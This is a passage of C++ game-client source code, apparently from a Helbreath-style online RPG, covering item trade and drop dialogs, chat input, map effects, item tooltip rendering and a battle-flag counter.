								GetNpcName(m_stDialogBoxInfo[17].sV3, m_stDialogBoxInfo[20].cStr);
								break;

							case 1000: // Trade stackable items
								// hum, dj affich? , j'attends le retour et je dsactive!


								if (m_stDialogBoxExchangeInfo[0].sV1 == -1)			m_stDialogBoxExchangeInfo[0].sItemID = m_stDialogBoxInfo[17].sV4;
								else if (m_stDialogBoxExchangeInfo[1].sV1 == -1)	m_stDialogBoxExchangeInfo[1].sItemID = m_stDialogBoxInfo[17].sV4;
								else if (m_stDialogBoxExchangeInfo[2].sV1 == -1)	m_stDialogBoxExchangeInfo[2].sItemID = m_stDialogBoxInfo[17].sV4;
								else if (m_stDialogBoxExchangeInfo[3].sV1 == -1)	m_stDialogBoxExchangeInfo[3].sItemID = m_stDialogBoxInfo[17].sV4;
#ifdef MULTI_TRADE
								//50Cent - MultiTrade
								else if (m_stDialogBoxExchangeInfo[4].sV1 == -1)    m_stDialogBoxExchangeInfo[4].sItemID = m_stDialogBoxInfo[17].sV4;
								else if (m_stDialogBoxExchangeInfo[5].sV1 == -1)    m_stDialogBoxExchangeInfo[5].sItemID = m_stDialogBoxInfo[17].sV4;
								else if (m_stDialogBoxExchangeInfo[6].sV1 == -1)    m_stDialogBoxExchangeInfo[6].sItemID = m_stDialogBoxInfo[17].sV4;
								else if (m_stDialogBoxExchangeInfo[7].sV1 == -1)    m_stDialogBoxExchangeInfo[7].sItemID = m_stDialogBoxInfo[17].sV4;
#endif
								else return; // Impossible case, tested at function beginning

								bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_SETEXCHANGEITEM, NULL, m_stDialogBoxInfo[17].sV4, iAmount, NULL, NULL);
								break;

							case 1001:
								// Sell List
								for (i = 0; i < DEF_MAXSELLLIST; i++)
									if (m_stSellItemList[i].iIndex == -1) {
										m_stSellItemList[i].iIndex = m_stDialogBoxInfo[17].sV4;
										m_stSellItemList[i].iAmount = iAmount;
										m_bIsItemDisabled[m_stDialogBoxInfo[17].sV4] = TRUE;
										break;
									}
								if (i == DEF_MAXSELLLIST) AddEventList(UPDATE_SCREEN_ONGAME6, 10);
								break;

							case 1002:
								if (_iGetBankItemCount() >= (DEF_MAXBANKITEMS - 1)) AddEventList(DLGBOX_CLICK_NPCACTION_QUERY9, 10);
								else bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_GIVEITEMTOCHAR, m_stDialogBoxInfo[39].sV1, iAmount, m_stDialogBoxInfo[39].sV5, m_stDialogBoxInfo[39].sV6, m_pItemList[m_stDialogBoxInfo[39].sV1]->m_cName, m_stDialogBoxInfo[39].sV4); //v1.4
								break;

							default:
								bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_GIVEITEMTOCHAR, (char)(m_stDialogBoxInfo[17].sView), iAmount, m_stDialogBoxInfo[17].sV1, m_stDialogBoxInfo[17].sV2, m_pItemList[m_stDialogBoxInfo[17].sView]->m_cName);
								break;
							}
							m_bIsItemDisabled[m_stDialogBoxInfo[17].sView] = TRUE;
						}
						else AddEventList(UPDATE_SCREEN_ONGAME7, 10);
					}
					else {
						if (iAmount <= 0)
						{
							AddEventList(UPDATE_SCREEN_ONGAME8, 10);
						}
						else
						{
							bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_ITEMDROP, NULL, m_stDialogBoxInfo[17].sView, iAmount, NULL, m_pItemList[m_stDialogBoxInfo[17].sView]->m_cName);
							m_bIsItemDisabled[m_stDialogBoxInfo[17].sView] = TRUE;
						}
					}
				}
				else
				{
					AddEventList(UPDATE_SCREEN_ONGAME9, 10);//"You entered more quantity that you can carry."
				}
			}
			DisableDialogBox(17);
		}
		else
		{
			if (!m_bInputStatus)
			{
				switch (m_cBackupChatMsg[0]){
				case '!':
				case '@':
				case '#':
				case '$':
				case '^':
					ZeroMemory(m_cChatMsg, sizeof(m_cChatMsg));
					m_cChatMsg[0] = m_cBackupChatMsg[0];
#ifdef RES_HIGH
					StartInputString(10, 532, sizeof(m_cChatMsg), m_cChatMsg); //5
#else
					StartInputString(10, 414, sizeof(m_cChatMsg), m_cChatMsg);
#endif
					break;
				default:
#ifdef RES_HIGH
					StartInputString(10, 532, sizeof(m_cChatMsg), m_cChatMsg);
#else
					StartInputString(10, 414, sizeof(m_cChatMsg), m_cChatMsg);
#endif
					ClearInputString();
					break;
				}
			}
			else
			{
				EndInputString();
				ZeroMemory(G_cTxt, sizeof(G_cTxt));
				ReceiveString((char *)G_cTxt);
				ZeroMemory(m_cBackupChatMsg, sizeof(m_cBackupChatMsg));
				strcpy(m_cBackupChatMsg, G_cTxt);
				if ((m_dwCurTime - dwPrevChatTime) >= 700)

				{
					dwPrevChatTime = m_dwCurTime;
					m_curse.ConvertString(G_cTxt, strlen(G_cTxt));
					if (strlen(G_cTxt) > 0)
					{
						if ((G_cTxt[0] == '!') || (G_cTxt[0] == '~'))
						{
							if (m_Misc.bCheckIMEString(G_cTxt) == FALSE) return;
						}
						bSendCommand(MSGID_COMMAND_CHATMSG, NULL, NULL, NULL, NULL, NULL, G_cTxt);
					}
				}
			}
		}
	}

	sVPXsave = m_sViewPointX;
	sVPYsave = m_sViewPointY;

	if ((m_iCameraShakingDegree > 0) && (iUpdateRet != 0))
	{
		m_sViewPointX += m_iCameraShakingDegree - (rand() % m_iCameraShakingDegree * 2);
		m_sViewPointY += m_iCameraShakingDegree - (rand() % m_iCameraShakingDegree * 2);
		m_iCameraShakingDegree--;
		if (m_iCameraShakingDegree <= 0) m_iCameraShakingDegree = 0;
	}

	sPivotX = m_pMapData->m_sPivotX;
	sPivotY = m_pMapData->m_sPivotY;
	sVal = m_sViewPointX - (sPivotX * 32);
	sDivX = sVal / 32;
	sModX = sVal % 32;
	sVal = m_sViewPointY - (sPivotY * 32);
	sDivY = sVal / 32;
	sModY = sVal % 32;

	if (iUpdateRet != 0)
	{
		DrawBackground(sDivX, sModX, sDivY, sModY);
		DrawEffectLights();
		DrawObjects(sPivotX, sPivotY, sDivX, sDivY, sModX, sModY, msX, msY);
		DrawEffects();
		DrawWhetherEffects();
		DrawChatMsgs(-100, 0, 800, 600);
		WhetherObjectFrameCounter();
	}

	if (m_cMapIndex == 26)	//Snoopy: Add Apocalypse map effect (fires in inferniaA)
	{
		m_pEffectSpr[89]->PutTransSprite(1296 - m_sViewPointX, 1283 - m_sViewPointY, _tmp_iEffectFrame % 12, 0);
		m_pEffectSpr[89]->PutTransSprite(1520 - m_sViewPointX, 1123 - m_sViewPointY, _tmp_iEffectFrame % 12, 0);
		m_pEffectSpr[89]->PutTransSprite(1488 - m_sViewPointX, 3971 - m_sViewPointY, _tmp_iEffectFrame % 12, 0);
		m_pEffectSpr[93]->PutTransSprite(2574 - m_sViewPointX, 3677 - m_sViewPointY, _tmp_iEffectFrame % 12, 0);
		m_pEffectSpr[93]->PutTransSprite(3018 - m_sViewPointX, 3973 - m_sViewPointY, _tmp_iEffectFrame % 12, 0);
	}
	else if (m_cMapIndex == 27)	//Add Apocalypse map effect (fires in inferniaB)
	{
		m_pEffectSpr[89]->PutTransSprite(1293 - m_sViewPointX, 3657 - m_sViewPointY, _tmp_iEffectFrame % 12, 0);
		m_pEffectSpr[89]->PutTransSprite(944 - m_sViewPointX, 3881 - m_sViewPointY, _tmp_iEffectFrame % 12, 0);
		m_pEffectSpr[89]->PutTransSprite(1325 - m_sViewPointX, 4137 - m_sViewPointY, _tmp_iEffectFrame % 12, 0);
		m_pEffectSpr[89]->PutTransSprite(1648 - m_sViewPointX, 3913 - m_sViewPointY, _tmp_iEffectFrame % 12, 0);
	}
	//Snoopy: Add Apocalypse Gate and apocalypse map effects (if no Gate, m_iGatePositX will be -1...
	if ((m_iGatePositX >= m_sViewPointX / 32) && (m_iGatePositX <= m_sViewPointX / 32 + 50) // 20
		&& (m_iGatePositY >= m_sViewPointY / 32) && (m_iGatePositY <= m_sViewPointY / 32 + 45)) // 15
	{
#ifdef RES_HIGH
		m_pEffectSpr[101]->PutTransSprite(m_iGatePositX * 32 - m_sViewPointX - 110, m_iGatePositY * 32 - m_sViewPointY - 97, _tmp_iEffectFrame % 30, dwTime);
#else
		m_pEffectSpr[101]->PutTransSprite(m_iGatePositX * 32 - m_sViewPointX - 96, m_iGatePositY * 32 - m_sViewPointY - 69, _tmp_iEffectFrame % 30, dwTime);
#endif
	}
	if (iUpdateRet != 0)
		DrawDialogBoxs(msX, msY, msZ, cLB);

	if ((iUpdateRet != 0) && m_bInputStatus)
	{
		if (((m_bIsDialogEnabled[7] == TRUE) && (m_stDialogBoxInfo[7].cMode == 1)) ||
			((m_bIsDialogEnabled[17] == TRUE) && (m_stDialogBoxInfo[17].cMode == 1)))
		{
		}
#ifdef RES_HIGH
		else m_DDraw.DrawShadowBox(0, 531, 799, 549);
#else
		else m_DDraw.DrawShadowBox(0, 413, 639, 429);
#endif
		ShowReceivedString();
	}

	if (iUpdateRet != 0) ShowEventList(m_dwCurTime);

	if ((iUpdateRet != 0) && (m_stMCursor.cSelectedObjectType == DEF_SELECTEDOBJTYPE_ITEM) &&
		(m_pItemList[m_stMCursor.sSelectedObjectID] != NULL))
	{
		cItemColor = m_pItemList[m_stMCursor.sSelectedObjectID]->m_cItemColor;
		if (cItemColor != 0) {
			if ((m_pItemList[m_stMCursor.sSelectedObjectID]->m_cEquipPos == DEF_EQUIPPOS_LHAND) ||
				(m_pItemList[m_stMCursor.sSelectedObjectID]->m_cEquipPos == DEF_EQUIPPOS_RHAND) ||
				(m_pItemList[m_stMCursor.sSelectedObjectID]->m_cEquipPos == DEF_EQUIPPOS_TWOHAND))
			{
				m_pSprite[DEF_SPRID_ITEMPACK_PIVOTPOINT + m_pItemList[m_stMCursor.sSelectedObjectID]->m_sSprite]->PutSpriteRGB(msX - m_stMCursor.sDistX, msY - m_stMCursor.sDistY,
					m_pItemList[m_stMCursor.sSelectedObjectID]->m_sSpriteFrame,
					m_wWR[cItemColor] - m_wR[0], m_wWG[cItemColor] - m_wG[0], m_wWB[cItemColor] - m_wB[0],
					dwTime);
			}
			else
			{
				m_pSprite[DEF_SPRID_ITEMPACK_PIVOTPOINT + m_pItemList[m_stMCursor.sSelectedObjectID]->m_sSprite]->PutSpriteRGB(msX - m_stMCursor.sDistX, msY - m_stMCursor.sDistY,
					m_pItemList[m_stMCursor.sSelectedObjectID]->m_sSpriteFrame,
					m_wR[cItemColor] - m_wR[0], m_wG[cItemColor] - m_wG[0], m_wB[cItemColor] - m_wB[0],
					dwTime);
			}
		}
		else m_pSprite[DEF_SPRID_ITEMPACK_PIVOTPOINT + m_pItemList[m_stMCursor.sSelectedObjectID]->m_sSprite]->PutSpriteFast(msX - m_stMCursor.sDistX, msY - m_stMCursor.sDistY,
			m_pItemList[m_stMCursor.sSelectedObjectID]->m_sSpriteFrame, dwTime);



		//ZeroEoyPnk - Recuadros negros para descripcion de items
		char cStr1[64], cStr2[64], cStr3[64], cStr4[64], cStr5[64], cStr6[64], cItemsTotal[64];
		int  iLoc, iLocStr2 = 0, iLocStr3 = 0, iLocStr4 = 0, iLocStr5 = 0, iLocStr6 = 0, ItemsTotal = 0;
		int  iStrLen1 = 0, iStrLen2 = 0, iStrLen3 = 0, iStrLen4 = 0, iStrLen5 = 0, iStrLen6 = 0;
		short msY1 = 0, msX1 = 0, msK = 0;
		GetItemName(m_pItemList[m_stMCursor.sSelectedObjectID], cStr1, cStr2, cStr3);

		iLoc = 0;
		if (strlen(cStr1) != 0)
		{
			if (m_bIsSpecial)
			{
				// VAMP - gold items
				if (m_bIsRare)
					PutString(msX, msY + 25, cStr1, RGB(255, 208, 60), FALSE, 1);
				else
					if (m_cDetailLevel != 2)
						PutString(msX, msY + 25, cStr1, RGB(0, 255, 50), FALSE, 1);
			}
			else {
				if (m_cDetailLevel != 2)
					PutString(msX, msY + 25, cStr1, RGB(255, 255, 255), FALSE, 1);
			}
			iLoc += 15;
		}
		if (strlen(cStr2) != 0)
		{
			if (m_cDetailLevel != 2)
				PutString(msX, msY + 25 + iLoc, cStr2, RGB(150, 150, 150), FALSE, 1);
			iLoc += 15;
			iLocStr2 += 15;
		}
		if (strlen(cStr3) != 0)
		{
			if (m_cDetailLevel != 2)
				PutString(msX, msY + 25 + iLoc, cStr3, RGB(150, 150, 150), FALSE, 1);
			iLoc += 15;
			iLocStr3 += 15;
		}
		if ((m_pItemList[m_stMCursor.sSelectedObjectID]->m_sLevelLimit != 0) && ((m_pItemList[m_stMCursor.sSelectedObjectID]->m_dwAttribute & 0x00000001) == 0))
		{
			wsprintf(cStr4, "%s: %d", DRAW_DIALOGBOX_SHOP24, m_pItemList[m_stMCursor.sSelectedObjectID]->m_sLevelLimit);//" : %d"
			if (m_cDetailLevel != 2)
				PutString(msX, msY + 25 + iLoc, cStr4, RGB(150, 150, 150), FALSE, 1);
			iLoc += 15;
			iLocStr4 += 15;
		}
		if ((m_pItemList[m_stMCursor.sSelectedObjectID]->m_cEquipPos != DEF_EQUIPPOS_NONE) && (m_pItemList[m_stMCursor.sSelectedObjectID]->m_wWeight >= 1100))
		{
			int	_wWeight = 0;
			if (m_pItemList[m_stMCursor.sSelectedObjectID]->m_wWeight % 100) _wWeight = 1;
			wsprintf(cStr5, DRAW_DIALOGBOX_SHOP15, m_pItemList[m_stMCursor.sSelectedObjectID]->m_wWeight / 100 + _wWeight);
			if (m_cDetailLevel != 2)
				PutString(msX, msY + 25 + iLoc, cStr5, RGB(150, 150, 150), FALSE, 1);
			iLoc += 15;
			iLocStr5 += 15;
		}
		if (m_pItemList[m_stMCursor.sSelectedObjectID]->m_cEquipPos != DEF_EQUIPPOS_NONE || !strcmp(m_pItemList[m_stMCursor.sSelectedObjectID]->m_cName, "ZemstoneofSacrifice"))
		{
			wsprintf(cStr6, UPDATE_SCREEN_ONGAME10, m_pItemList[m_stMCursor.sSelectedObjectID]->m_wCurLifeSpan);
			if (m_cDetailLevel != 2)
				PutString(msX, msY + 25 + iLoc, cStr6, RGB(150, 150, 150), FALSE, 1);
			iLoc += 15;
			iLocStr6 += 15;
		}

		if (iLoc == 15)
		{
			iLoc = 0;
			for (int iTmp = 0; iTmp < DEF_MAXITEMS; iTmp++)
			{
				if (m_pItemList[iTmp] != NULL)
				{
					if (strcmp(m_pItemList[iTmp]->m_cName, m_pItemList[m_stMCursor.sSelectedObjectID]->m_cName) == 0) iLoc++;
					ItemsTotal = 1;
				}
			}
			if (iLoc > 1)
			{
				wsprintf(cItemsTotal, DEF_MSG_TOTAL_NUMBER, iLoc);
				ItemsTotal += iLoc;
				if (m_cDetailLevel != 2)
					PutString(msX, msY + 40, cItemsTotal, RGB(150, 150, 150), FALSE, 1);
			}
		}
		//Coloco el recuadro - ZeroEoyPnk
		if (m_cDetailLevel == 2)
		{
			iStrLen1 = strlen(cStr1);
			iStrLen2 = strlen(cStr2);
			iStrLen3 = strlen(cStr3);
			iStrLen4 = strlen(cStr4);
			iStrLen5 = strlen(cStr5);
			iStrLen6 = strlen(cStr6);

			if (ItemsTotal > 1)
				iLoc = 30;
			else if (ItemsTotal == 1)
				iLoc = 13;

			if ((msY + iLoc + 28) > 600)
				msY1 = 600;
			else msY1 = msY + iLoc + 28;

			if ((iStrLen1 > 0) && (iStrLen1 >= iStrLen2) && (iStrLen1 >= iStrLen3) && (iStrLen1 >= iStrLen4)
				&& (iStrLen1 >= iStrLen5) && (iStrLen1 >= iStrLen6))
			{
				if (iStrLen1 < 20)
					msK = iStrLen1 * 5 + 40;
				else
					msK = iStrLen1 * 5 + 20;
			}
			else if ((iStrLen2 > 0) && (iStrLen2 >= iStrLen3) && (iStrLen2 >= iStrLen4)
				&& (iStrLen2 >= iStrLen5) && (iStrLen2 >= iStrLen6))
				msK = iStrLen2 * 5 + 20;
			else if ((iStrLen3 > 0) && (iStrLen3 >= iStrLen4)
				&& (iStrLen3 >= iStrLen5) && (iStrLen3 >= iStrLen6))
				msK = iStrLen3 * 5 + 20;
			else if ((iStrLen4 > 0) && (iStrLen4 >= iStrLen5) && (iStrLen4 >= iStrLen6))
				msK = iStrLen4 * 5 + 20;
			else if ((iStrLen5 > 0) && (iStrLen5 >= iStrLen6))
				msK = iStrLen5 * 5 + 20;
			else if (iStrLen6 > 0)
				msK = iStrLen5 * 5 + 70;


			msX1 = msX + msK;
			if (msX1 > 800)
				msX1 = 800;

			m_DDraw.DrawShadowBox(msX, msY + 25, msX1, msY1);
			PutAlignedString(msX, msX + msK, msY + 25, cStr1, 234, 176, 51);

			if (ItemsTotal > 1)
				PutAlignedString(msX, msX + msK, msY + 25 + 15, cItemsTotal, 255, 255, 255);

			if (iLocStr2 > 0)
			{	//Purity
				if (memcmp(GET_ITEM_NAME1, cStr2, 6) == 0)
					PutAlignedString(msX, msX + msK, msY + 25 + iLocStr2, cStr2, 255, 255, 255); // Blanco
				//Completion
				else if (memcmp(GET_ITEM_NAME2, cStr2, 10) == 0)
					PutAlignedString(msX, msX + msK, msY + 25 + iLocStr2, cStr2, 255, 255, 255); // Blanco
				//Critical
				else if (memcmp(GET_ITEM_NAME3, cStr2, 8) == 0)
					PutAlignedString(msX, msX + msK, msY + 25 + iLocStr2, cStr2, 221, 203, 49); // Amarillo
				// Poisoning
				else if (memcmp(GET_ITEM_NAME4, cStr2, 9) == 0)
					PutAlignedString(msX, msX + msK, msY + 25 + iLocStr2, cStr2, 145, 209, 61); // Verde
				// Righteous
				else if (memcmp(GET_ITEM_NAME5, cStr2, 9) == 0)
					PutAlignedString(msX, msX + msK, msY + 25 + iLocStr2, cStr2, 119, 119, 119); // 
				// Agile
				else if (memcmp(GET_ITEM_NAME6, cStr2, 5) == 0)
					PutAlignedString(msX, msX + msK, msY + 25 + iLocStr2, cStr2, 137, 185, 195); // 
				// Light
				else if (memcmp(GET_ITEM_NAME7, cStr2, 5) == 0)
					PutAlignedString(msX, msX + msK, msY + 25 + iLocStr2, cStr2, 255, 235, 104); // 
				// Sharp
				else if (memcmp(GET_ITEM_NAME8, cStr2, 5) == 0)
					PutAlignedString(msX, msX + msK, msY + 25 + iLocStr2, cStr2, 41, 70, 218); // 
				// Strong
				else if (memcmp(GET_ITEM_NAME9, cStr2, 6) == 0)
					PutAlignedString(msX, msX + msK, msY + 25 + iLocStr2, cStr2, 113, 113, 113); //
				// Ancient
				else if (memcmp(GET_ITEM_NAME10, cStr2, 7) == 0)
					PutAlignedString(msX, msX + msK, msY + 25 + iLocStr2, cStr2, 195, 77, 147); //
				// Special
				else if (memcmp(GET_ITEM_NAME11, cStr2, 7) == 0)
					PutAlignedString(msX, msX + msK, msY + 25 + iLocStr2, cStr2, 223, 148, 3); //
				// Mana Converting
				else if (memcmp(GET_ITEM_NAME12, cStr2, 15) == 0)
					PutAlignedString(msX, msX + msK, msY + 25 + iLocStr2, cStr2, 113, 169, 226); //
				// Critical
				else if (memcmp(GET_ITEM_NAME13, cStr2, 8) == 0)
					PutAlignedString(msX, msX + msK, msY + 25 + iLocStr2, cStr2, 221, 203, 49); //
				// Critical Hit Damage
				else if (memcmp(GET_ITEM_NAME14, cStr2, 19) == 0)
					PutAlignedString(msX, msX + msK, msY + 25 + iLocStr2, cStr2, 221, 203, 49); //
				// Poison Damage
				else if (memcmp(GET_ITEM_NAME15, cStr2, 13) == 0)
					PutAlignedString(msX, msX + msK, msY + 25 + iLocStr2, cStr2, 145, 209, 61); // Verde
				// Attack Speed -1
				else if (memcmp(GET_ITEM_NAME16, cStr2, 15) == 0)
					PutAlignedString(msX, msX + msK, msY + 25 + iLocStr2, cStr2, 137, 185, 195); //
				// light
				else if (memcmp(GET_ITEM_NAME17, cStr2, 5) == 0)
					PutAlignedString(msX, msX + msK, msY + 25 + iLocStr2, cStr2, 255, 235, 104); //
				// Damage added
				else if (memcmp(GET_ITEM_NAME18, cStr2, 12) == 0)
					PutAlignedString(msX, msX + msK, msY + 25 + iLocStr2, cStr2, 206, 18, 115); //
				// Endurance
				else if (memcmp(GET_ITEM_NAME19, cStr2, 9) == 0)
					PutAlignedString(msX, msX + msK, msY + 25 + iLocStr2, cStr2, 139, 139, 139); //
				// Extra Damage added
				else if (memcmp(GET_ITEM_NAME20, cStr2, 18) == 0)
					PutAlignedString(msX, msX + msK, msY + 25 + iLocStr2, cStr2, 228, 184, 67); //
				// Magic Casting Probability
				else if (memcmp(GET_ITEM_NAME21, cStr2, 25) == 0)
					PutAlignedString(msX, msX + msK, msY + 25 + iLocStr2, cStr2, 214, 72, 72); //
				// Replace %d%% damage to mana
				else if (memcmp(GET_ITEM_NAME22, cStr2, 7) == 0)
					PutAlignedString(msX, msX + msK, msY + 25 + iLocStr2, cStr2, 113, 169, 226); //
				// Crit Increase Chance
				else if (memcmp(GET_ITEM_NAME23, cStr2, 20) == 0)
					PutAlignedString(msX, msX + msK, msY + 25 + iLocStr2, cStr2, 221, 203, 49); //
				// Poison Resistance
				else if (memcmp(GET_ITEM_NAME24, cStr2, 17) == 0)
					PutAlignedString(msX, msX + msK, msY + 25 + iLocStr2, cStr2, 145, 209, 61); // Verde
				// Hitting Probability
				else if (memcmp(GET_ITEM_NAME25, cStr2, 19) == 0)
					PutAlignedString(msX, msX + msK, msY + 25 + iLocStr2, cStr2, 200, 165, 3); //
				// Defense Ratio
				else if (memcmp(GET_ITEM_NAME26, cStr2, 13) == 0)
					PutAlignedString(msX, msX + msK, msY + 25 + iLocStr2, cStr2, 170, 127, 174); //
				// HP recovery
				else if (memcmp(GET_ITEM_NAME27, cStr2, 11) == 0)
					PutAlignedString(msX, msX + msK, msY + 25 + iLocStr2, cStr2, 216, 38, 38); // Rojo
				// SP recovery
				else if (memcmp(GET_ITEM_NAME28, cStr2, 11) == 0)
					PutAlignedString(msX, msX + msK, msY + 25 + iLocStr2, cStr2, 145, 209, 61); // Verde
				// MP recovery
				else if (memcmp(GET_ITEM_NAME29, cStr2, 11) == 0)
					PutAlignedString(msX, msX + msK, msY + 25 + iLocStr2, cStr2, 113, 169, 226); // Azul
				// Magic Resistance
				else if (memcmp(GET_ITEM_NAME30, cStr2, 16) == 0)
					PutAlignedString(msX, msX + msK, msY + 25 + iLocStr2, cStr2, 145, 187, 87); // 
				// Physical Absorption
				else if (memcmp(GET_ITEM_NAME31, cStr2, 19) == 0)
					PutAlignedString(msX, msX + msK, msY + 25 + iLocStr2, cStr2, 38, 122, 118); // 
				// Magic Absorption
				else if (memcmp(GET_ITEM_NAME32, cStr2, 16) == 0)
					PutAlignedString(msX, msX + msK, msY + 25 + iLocStr2, cStr2, 175, 26, 100); //
				// Consecutive Attack Damage
				else if (memcmp(GET_ITEM_NAME33, cStr2, 25) == 0)
					PutAlignedString(msX, msX + msK, msY + 25 + iLocStr2, cStr2, 228, 184, 67); //
				// Experience
				else if (memcmp(GET_ITEM_NAME34, cStr2, 10) == 0)
					PutAlignedString(msX, msX + msK, msY + 25 + iLocStr2, cStr2, 168, 74, 140); //
				// Gold
				else if (memcmp(GET_ITEM_NAME35, cStr2, 4) == 0)
					PutAlignedString(msX, msX + msK, msY + 25 + iLocStr2, cStr2, 223, 148, 3); //
				else
					PutAlignedString(msX, msX + msK, msY + 25 + iLocStr2, cStr2, 255, 255, 255);

				if (iLocStr3 > 0)
					iLocStr3 += iLocStr2;
				else if (iLocStr4 > 0)
					iLocStr4 += iLocStr2;
				else if (iLocStr5 > 0)
					iLocStr5 += iLocStr2;
				else if (iLocStr6 > 0)
					iLocStr6 += iLocStr2;
			}
			if (iLocStr3 > 0)
			{
				//Purity
				if (memcmp(GET_ITEM_NAME1, cStr3, 6) == 0)
					PutAlignedString(msX, msX + msK, msY + 25 + iLocStr3, cStr3, 255, 255, 255); // Blanco
				//Completion
				else if (memcmp(GET_ITEM_NAME2, cStr3, 10) == 0)
					PutAlignedString(msX, msX + msK, msY + 25 + iLocStr3, cStr3, 255, 255, 255); // Blanco
				// Critical Hit Damage
				else if (memcmp(GET_ITEM_NAME14, cStr3, 19) == 0)
					PutAlignedString(msX, msX + msK, msY + 25 + iLocStr3, cStr3, 221, 203, 49); //
				// Poison Damage
				else if (memcmp(GET_ITEM_NAME15, cStr3, 13) == 0)
					PutAlignedString(msX, msX + msK, msY + 25 + iLocStr3, cStr3, 145, 209, 61); // Verde
				// Attack Speed -1
				else if (memcmp(GET_ITEM_NAME16, cStr3, 15) == 0)
					PutAlignedString(msX, msX + msK, msY + 25 + iLocStr3, cStr3, 137, 185, 195); //
				// light
				else if (memcmp(GET_ITEM_NAME17, cStr3, 5) == 0)
					PutAlignedString(msX, msX + msK, msY + 25 + iLocStr3, cStr3, 255, 235, 104); //
				// Damage added
				else if (memcmp(GET_ITEM_NAME18, cStr3, 12) == 0)
					PutAlignedString(msX, msX + msK, msY + 25 + iLocStr3, cStr3, 206, 18, 115); //
				// Endurance
				else if (memcmp(GET_ITEM_NAME19, cStr3, 9) == 0)
					PutAlignedString(msX, msX + msK, msY + 25 + iLocStr3, cStr3, 139, 139, 139); //
				// Extra Damage added
				else if (memcmp(GET_ITEM_NAME20, cStr3, 18) == 0)
					PutAlignedString(msX, msX + msK, msY + 25 + iLocStr3, cStr3, 228, 184, 67); //
				// Magic Casting Probability
				else if (memcmp(GET_ITEM_NAME21, cStr3, 25) == 0)
					PutAlignedString(msX, msX + msK, msY + 25 + iLocStr3, cStr3, 214, 72, 72); //
				// Replace %d%% damage to mana
				else if (memcmp(GET_ITEM_NAME22, cStr3, 7) == 0)
					PutAlignedString(msX, msX + msK, msY + 25 + iLocStr3, cStr3, 113, 169, 226); //
				// Crit Increase Chance
				else if (memcmp(GET_ITEM_NAME23, cStr3, 20) == 0)
					PutAlignedString(msX, msX + msK, msY + 25 + iLocStr3, cStr3, 221, 203, 49); //
				// Poison Resistance
				else if (memcmp(GET_ITEM_NAME24, cStr3, 17) == 0)
					PutAlignedString(msX, msX + msK, msY + 25 + iLocStr3, cStr3, 145, 209, 61); // Verde
				// Hitting Probability
				else if (memcmp(GET_ITEM_NAME25, cStr3, 19) == 0)
					PutAlignedString(msX, msX + msK, msY + 25 + iLocStr3, cStr3, 200, 165, 3); //
				// Defense Ratio
				else if (memcmp(GET_ITEM_NAME26, cStr3, 13) == 0)
					PutAlignedString(msX, msX + msK, msY + 25 + iLocStr3, cStr3, 170, 127, 174); //
				// HP recovery
				else if (memcmp(GET_ITEM_NAME27, cStr3, 11) == 0)
					PutAlignedString(msX, msX + msK, msY + 25 + iLocStr3, cStr3, 216, 38, 38); // Rojo
				// SP recovery
				else if (memcmp(GET_ITEM_NAME28, cStr3, 11) == 0)
					PutAlignedString(msX, msX + msK, msY + 25 + iLocStr3, cStr3, 145, 209, 61); // Verde
				// MP recovery
				else if (memcmp(GET_ITEM_NAME29, cStr3, 11) == 0)
					PutAlignedString(msX, msX + msK, msY + 25 + iLocStr3, cStr3, 113, 169, 226); // Azul
				// Magic Resistance
				else if (memcmp(GET_ITEM_NAME30, cStr3, 16) == 0)
					PutAlignedString(msX, msX + msK, msY + 25 + iLocStr3, cStr3, 145, 187, 87); // 
				// Physical Absorption
				else if (memcmp(GET_ITEM_NAME31, cStr3, 19) == 0)
					PutAlignedString(msX, msX + msK, msY + 25 + iLocStr3, cStr3, 38, 122, 118); // 
				// Magic Absorption
				else if (memcmp(GET_ITEM_NAME32, cStr3, 16) == 0)
					PutAlignedString(msX, msX + msK, msY + 25 + iLocStr3, cStr3, 175, 26, 100); //
				// Consecutive Attack Damage
				else if (memcmp(GET_ITEM_NAME33, cStr3, 25) == 0)
					PutAlignedString(msX, msX + msK, msY + 25 + iLocStr3, cStr3, 228, 184, 67); //
				// Experience
				else if (memcmp(GET_ITEM_NAME34, cStr3, 10) == 0)
					PutAlignedString(msX, msX + msK, msY + 25 + iLocStr3, cStr3, 168, 74, 140); //
				// Gold
				else if (memcmp(GET_ITEM_NAME35, cStr3, 4) == 0)
					PutAlignedString(msX, msX + msK, msY + 25 + iLocStr3, cStr3, 223, 148, 3); //
				else
					PutAlignedString(msX, msX + msK, msY + 25 + iLocStr3, cStr3, 250, 250, 250);
				if (iLocStr4 > 0)
					iLocStr4 += iLocStr3;
				else if (iLocStr5 > 0)
					iLocStr5 += iLocStr3;
				else if (iLocStr6 > 0)
					iLocStr6 += iLocStr3;
			}
			if (iLocStr4 > 0)
			{
				PutAlignedString(msX, msX + msK, msY + 25 + iLocStr4, cStr4, 255, 255, 255);
				if (iLocStr5 > 0)
					iLocStr5 += iLocStr4;
				else if (iLocStr6 > 0)
					iLocStr6 += iLocStr4;
			}
			if (iLocStr5 > 0)
			{
				PutAlignedString(msX, msX + msK, msY + 25 + iLocStr5, cStr5, 255, 255, 255);
				if (iLocStr6 > 0)
					iLocStr6 += iLocStr5;
			}
			if (iLocStr6 > 0)
				PutAlignedString(msX, msX + msK, msY + 25 + iLocStr6, cStr6, 255, 255, 255);
		}
	}
	// ZeroEoyPnk - Recuadros negros para descripcion de items

	//Snoopy: Add Apocalypse map effect (druncncity bubbles)
	if (m_cMapIndex == 25)
	{
#ifdef RES_HIGH
		bAddNewEffect(13, m_sViewPointX + rand() % 800, m_sViewPointY + rand() % 600, 0, 0, -1 * (rand() % 80), 1);
#else
		bAddNewEffect(13, m_sViewPointX + rand() % 640, m_sViewPointY + rand() % 480, 0, 0, -1 * (rand() % 80), 1);
#endif
	}

	//Snoopy adding Heldenian turret count:
	if ((iUpdateRet != 0) && (m_bIsHeldenian) && (memcmp(m_cCurLocation, "BtField", 7) == 0))
	{
		wsprintf(G_cTxt, "Aresden flags : %d", m_iHeldenianAresdenFlags);
		PutString(10, 140, G_cTxt, RGB(255, 255, 255));
		wsprintf(G_cTxt, "Elvine flags : %d", m_iHeldenianElvineFlags);
		PutString(10, 160, G_cTxt, RGB(255, 255, 255));
		wsprintf(G_cTxt, "Aresden death toll : %d", m_iHeldenianAresdenDead);
